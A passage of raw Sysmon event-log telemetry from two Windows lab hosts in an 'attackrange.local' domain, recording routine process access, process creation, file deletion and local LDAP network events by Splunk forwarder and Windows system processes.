Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291504Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-023D-6088-F929-00000000BB01}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291503Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-023D-6088-F929-00000000BB01}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440279Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:25.152{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440278Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:25.152{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440284Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:26.610{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF1D3FD17523E30E88B556EC755FB65D,SHA256=EC2BA130CF237D38B163B8A1C1CB5E9F1D7B6D498E99B565E37B6428939E5143,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291545Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-023E-6088-FB29-00000000BB01}1752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291544Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291543Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291542Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291541Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291540Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291539Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291538Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291537Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291536Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291535Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-023E-6088-FB29-00000000BB01}1752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291534Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.632{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-023E-6088-FB29-00000000BB01}1752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291533Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.633{BEA10069-023E-6088-FB29-00000000BB01}1752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291532Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:26.116{BEA10069-023D-6088-FA29-00000000BB01}28684364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440283Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:26.153{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440282Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:26.153{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440290Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:27.831{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B98DCC5E153C40A4B5202E8E971030C0,SHA256=3060EF49B4E6DC1931B57C4801716B406127FF0E52116DAA8EEC1D42BA579D60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291547Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:27.112{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C935817FD3BC26BE35F3C4483CA655D4,SHA256=9EECB2B8ACA9EBFA4B2E798B634AEC95CB1D8CD814CBEE9E26423EC72D56A819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291546Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:27.112{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB31071C0579A87750BB931965781B1E,SHA256=D36159BC91B572F82C8CA0DD6B115B878025541F4626A5D060F40E3608476071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440289Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:27.462{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E7649EFB2E54170FA4B844BD4279A79,SHA256=D3CFA7043B26ABB7A3E86A4C876D2D2A3E5CAD47CF1D922B3B09BC2601D51158,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440288Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:23.236{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62400-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 354300x8000000000000000440287Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:23.236{42DC5269-CEA9-6086-2300-00000000BA01}2704C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local62400-true0:0:0:0:0:0:0:1win-dc-932.attackrange.local389ldap 10341000x8000000000000000440286Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:27.153{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440285Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:27.153{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440294Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:28.869{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DFB350A639AD478C5891B82E0E80C9E,SHA256=ECF0CF5F910AEB84375DF382EB09483BAC9E28967F78032579DB0804365C12E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291548Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:28.115{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=756D91C061030BBA1B2CBBC4EE67B2DC,SHA256=284BFD3BE724BF7970896DE1F8A17EAC62E711753C5A8E542DC9E7A20BD0866F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440293Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:24.694{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62401-false10.0.1.12-8000- 10341000x8000000000000000440292Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:28.154{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 